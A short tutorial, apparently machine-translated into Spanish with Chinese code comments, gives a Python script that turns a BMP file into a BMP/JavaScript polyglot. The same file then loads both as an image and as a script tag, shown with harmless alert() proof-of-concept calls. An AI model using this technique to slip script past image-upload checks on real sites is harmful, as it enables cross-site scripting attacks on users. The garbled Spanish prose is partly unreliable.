foto BMP utilizando editor de texto para abrir hexadecimal, las dos primeras letras BM, representa el formato de imagen, el navegador es básicamente para identificar con esta imagen BMP, ponemos los siguientes datos (cuadro de datos binarios) Todos los comentarios en su anexa nuestra secuencia de comandos para atacar
# -*- coding: cp936 -*-
img='1.bmp'
pfile=open(img,"rb")
buff=pfile.read()
#替换掉/*符号
buff=buff.replace(b'\x2F\x2A',b'\x00\x00')
pfile.close()
#在第三个位置插入/*
pfile=open(img,"wb")
pfile.write(buff)
pfile.seek(2,0)
pfile.write(b'\x2F\x2A')
pfile.close()
#图片数据的最后追加 */=1;
#这样就把图片的数据注释了,剩下的后面就是js的脚本
pfile=open(img,"ab")
pfile.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
pfile.write(open('t.js','rb').read())
pfile.close()
print('写入成功')
guión js, t.js
alert('Tony');
alert('BM='+BM)Se resolvieron mirada dentro del navegador, se pueden ver dos ventanas emergentes y un mapa
<img src='1.bmp' />
<script src='1.bmp'></script>
